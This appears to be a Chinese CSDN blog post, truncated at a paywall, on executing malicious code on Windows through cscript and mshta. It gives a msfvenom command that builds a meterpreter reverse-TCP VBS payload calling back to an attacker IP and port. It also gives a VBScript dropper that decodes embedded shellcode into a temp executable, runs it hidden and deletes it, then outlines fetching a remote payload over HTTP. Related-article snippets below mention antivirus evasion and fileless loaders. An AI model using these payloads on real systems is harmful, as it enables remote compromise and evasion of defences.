cscript 执行代码_在Windows上执行恶意代码 by cscript&mshta

最新推荐文章于 2022-03-24 10:29:09 发布
VIP文章 最新推荐文章于 2022-03-24 10:29:09 发布
阅读量1.3k 收藏
点赞数
文章标签: cscript 执行代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28950403/article/details/113022877
版权

Windows自带的可执行文件+合理构造的payload脚本=获得会话

cscript

简介

在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。

WSH环境包括两个脚本宿主:基于控制台的CScript和基于GUI的WScript。这两个脚本宿主提供几乎相同的功能,在大多数情况下,使用哪个脚本宿主来运行脚本并不重要。

两个例外在于您如何与脚本交互; 也就是说,如何将信息输入脚本(输入)以及脚本如何显示已检索的信息(输出)。通常,CScript从命令提示符接收输入并在命令窗口中显示输出。相比之下,WScript通过图形对话框接收输入,并在图形消息框中显示输出。

实践

生成payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.138.142 LPORT=4444 -f vbs -o ./1.vbs,查看下生成的内容(限于篇幅略去,有个很长的字符串就是payload.exe)

有人翻译了一下,得到如下结果

shellcode = WScript.Arguments.Item(0)

strXML = "" & shellcode & ""

Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")

oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue

set oXMLDoc = nothing

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

Dim tempdir

Dim basedir

Set tempdir = fso.GetSpecialFolder(2)

basedir = tempdir & "\" & fso.GetTempName()

fso.CreateFolder(basedir)

tempexe = basedir & "\" & "test.exe"

Dim adodbstream

Set adodbstream = CreateObject("ADODB.Stream")

adodbstream.Type = 1

adodbstream.Open

adodbstream.Write decode

adodbstream.SaveToFile tempexe, 2

Dim wshell

Set wshell = CreateObject("Wscript.Shell")

wshell.run tempexe, 0, true

fso.DeleteFile(tempexe)

fso.DeleteFolder(basedir)

直接用echo的方式用一行命令往目标机上写入vbs文件,用^作为转义符。但是因为shellcode字符串太长了,cmd缓冲区不够用,于是改用MSXML2.XMLHTTP发起http请求获取远端payload.exe后再执行。

echo strFileURL &

最低0.47元/天 解锁文章
格子调子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cscript.exe自动启动解决方法分享
09-30
现在给下VPS客户cscript.exe自动启动解决办法,希望可以服务器相关客户解决问题
vbs提示没有在该机执行windows脚本宿主的权限。请与系统管理员联系
08-24
主要介绍了关于运行VBS文件提示没有在该机执行windows脚本宿主的权限。请与系统管理员联系。错误的解决方法,需要的朋友可以参考下
java 重启系统_windows server上重启java程序bat脚本
weixin_42320332的博客
03-05 735
脚本内容如下(windows10系统已测试可用):tskill java%1 mshta vbscript:CreateObject(“WScript.Shell”).Run("%~s0 ::",0,FALSE)(window.close)&&exitnohup java -jar C:\Users\Administrator\Desktop\hqb-gold-activity-0...
那些shellcode免杀总结
mingyqf的博客
03-24 7174
那些shellcode免杀总结 卿i(https://xz.aliyun.com/u/15540) / 2020-02-07 08:57:08 / 浏览数 20471 自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。 文中我将shellcode免杀技巧分为 "分离“、”混淆“两个大类,通过不同技巧针对不同检测方式,也就是常听到的特征检测、行
windows 反弹shell_原创干货 | windows反弹shell小结
weixin_39533896的博客
11-19 1100
前言本文是att&ck Command-Line Interface的展开篇平时遇到rce的漏洞,我们通常会弹一个shell给自己,(提权,内网渗透,搭建跳板,等等)linux反弹shell得益于命令行特别友好,所以我们可以非常简单地就可以把shell弹出来,比如使用bash,perl,python,nc,获得shell的原理其实就是建立了一个socket通道,那么今天我们来看看...
cscript.exe
05-29
cscript.exe
cSCRIPT
weixin_30670925的博客
10-24 247
cSCRIPT类: 功能:创建一个SCRIPT标签 构造函数: cSCRIPT() 功能:初始化SCRIPT标签 方法: addF(fname,lParm,content) 功能:为SCRIPT标签添加一个函数 参数说明: fname 函数名 lParm 参数字符串 content 函数体 getHTML() 功...
CScript
weixin_30823833的博客
03-24 271
用法:CScript scriptname.extension [option...] [arguments...] 选项: //B 批模式:不显示脚本错误及提示信息 //D 启用 Active Debugging //E:engine 使用执行脚本的引擎 OptionExplicit 'OnErrorResumeNext Dim...
C编译器CScript.zip
07-19
C 是一个 Shell 脚本,可以用一行代码编译和执行 C 脚本。 标签:CScript
script 命令用法
weixin_30765475的博客
08-11 168
Script makes a typescript of everything printed on your terminal. NAME script - make typescript of terminal session SYNOPSIS script [-a] [-c COMMAND] [-f] [-q] [-t] [file] ...
Wscript 和 Cscript 运行脚本的区别详解
09-04
WSCRIPT与CScript的主要区别在于WSCRIPT窗口中运行返回对话框,而CScrip在命令行中运行,一般不需要特别注明,程序会提示
cscript adsutil.vbs 设置iis参数提示拒绝访问的解决方法
09-05
今天帮客户网站开启gzip,为了方便用的是批处理版本,本地测试正常服务器上运行出现拒绝访问错误
域渗透总结
热门推荐
river
12-19 1万+
域渗透总结 学习并做了一段时间域网络渗透,给我直观的感受就是思路问题和耐心,这个不像技术研究,需要对一个点进行研究,而是遇到问题后要从多个方面思考,寻找"捷径"思路,只要思路正确,有足够有耐心,总会有所突破。现在将自己遇到的技术点及相关知识做一个总结,不足之处,请批评指正。 ​ -----一只萌新 域环境搭建不再详述,参考: > AD域环境的搭建 基于Ser...
Advances in Windows Shellcode
xfreeboy的专栏
11-08 2883
Advances in Windows Shellcode  转载: http://www.phrack.org不错的文章.我自己看的时候就要开着金山词霸2005.惭愧..就不给大家翻译了.有兴趣的就看看吧...Quoted from Unkown:==Phrack Inc.==Volume 0xXX, Issue 0x3e, Phile #0x07 o
通过js/vbs实现shellcode免杀无文件执行
m0_46059204的博客
05-11 1094
通过利用CACTUSTORCH实现调用vbs或cscript.exe的方式实现shellcode和加载器的分离。shellcode运行进程通过js混淆隐藏,并通过调用ActiveX方式调用.NET的库,达成无文件落地状态执行的目的。 目前CACTUSTORCH原始加载器已不免杀,我们通过重新编译一份加载器方式更改特征绕过。 function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var
Windows文件传输及执行—Cscript/Wscript
qq_27828281的博客
12-16 897
Windows平台使用Cscript/Wscript下载文件并执行
cscript 执行代码_WSCRIPT与CScript区别
weixin_30368405的博客
02-23 1204
WSCRIPT与CScript区别窗口中运行,WSCRIPT;命令行中运行,CScrip;cscript因为把输出放进了控制台 所以可以对它重定向 方便程序调用wscript直接用窗口输出 适合调试程序和编写小工具 在windows下不用cmd的话cscript的输出会一闪而过 大多数情况下,列在下表中的选项适用于 WScript.exe 和 CScript.exe。例外情况会加以注释。参数...
cscript 发http请求
chenhao0568的专栏
03-20 308
run.bat c:\windows\syswow64\cscript.exe http.vbs pause http.vbs Function SaveHtml(p_name, p_body) On Error Resume Next Dim ado Set ado = CreateObject("ADODB.Stream") ado.Mode = adModeReadWr...
基于matlab实现的数值计算及金融运用 ,金融时间序列数据分析 ,MATLAB和其他软件数据连接.rar
最新发布
05-02
基于matlab实现的数值计算及金融运用 ,金融时间序列数据分析 ,MATLAB和其他软件数据连接.rar
如何在linux窗口执行vbs文件,vbscript 能在linux运行吗?
05-25
VBS(Visual Basic Script)是一种Windows操作系统下的脚本语言,因此在Linux系统中无法直接运行VBS脚本文件。但是,您可以使用Wine软件来模拟Windows环境并运行VBS文件。以下是在Linux中运行VBS文件的步骤: 1. 安装Wine软件。您可以使用以下命令在Ubuntu和Debian上安装Wine: ``` sudo apt-get install wine ``` 2. 将VBS文件复制到Linux系统中。 3. 在Linux终端中,使用以下命令运行VBS文件: ``` wine cscript.exe script.vbs ``` 其中,script.vbs是您要运行的VBS脚本文件的文件名。 需要注意的是,由于VBS是为Windows环境设计的,因此在Linux系统中运行VBS脚本可能会出现一些兼容性问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值